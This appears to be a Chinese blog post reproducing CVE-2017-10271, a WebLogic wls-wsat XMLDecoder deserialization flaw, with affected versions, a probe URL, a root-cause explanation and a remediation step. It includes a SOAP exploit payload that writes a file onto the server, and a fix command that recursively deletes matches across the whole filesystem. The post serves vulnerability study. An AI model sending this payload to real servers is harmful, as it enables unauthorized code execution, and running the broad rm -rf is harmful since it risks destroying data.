java 代码执行 export命令_Weblogic远程代码执行漏洞

简介:

WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击。

    XMLDecoder用于将XMLEncoder创建的xml文档内容反序列化为一个Java对象,其位于java.beans包下。

影响版本:

10.3.6.0.0、12.1.3.0.0、12.2.1.1.0、12.2.1.2.0

漏洞复现:

首先在登陆界面查看weblogic的版本

0c894e9469810b5e08ef9a119117b429.png

访问/wls-wsat/CoordinatorPortType11

7e18b8d694ca435c01d86a02fc5df3cf.png

如果存在此界面证明存在此漏洞,该漏洞就是利用此文件来进行远程代码执行

17da64d7279c371bcf6ffdb79eb209df.png

d1fd0300b745388df14b3c163be8ec48.png

Payload

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">      <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">         <java version="1.6.0" class="java.beans.XMLDecoder">                    <object class="java.io.PrintWriter">                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test1.txtstring><void method="println">                        <string>xmldecoder_vul_teststring>void><void method="close"/>                    object>            java>        work:WorkContext>      soapenv:Header>      <soapenv:Body/>soapenv:Envelope>

漏洞修复:

删除weblogic的wls-wsat组件,在删除的过程中先暂停weblogic服务。

rm -rf `find / -name wls-wsat*`

漏洞原理:

CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下:http://192.168.xx.xx:7001/wls-wsat/CoordinatorP ortType。post数据包,通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。

自我收获:

这个漏洞首先比较老一些但是首先对自己思路上的一个启示,weblogic的这个漏洞是来源于wls-wsat组件的,所以在于以后的测试过程当中我对于一些组件可以有测试的意识,让自己测试的思路更加完善,然后就是通过这个复现我了解了wls-wsat这个组件

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值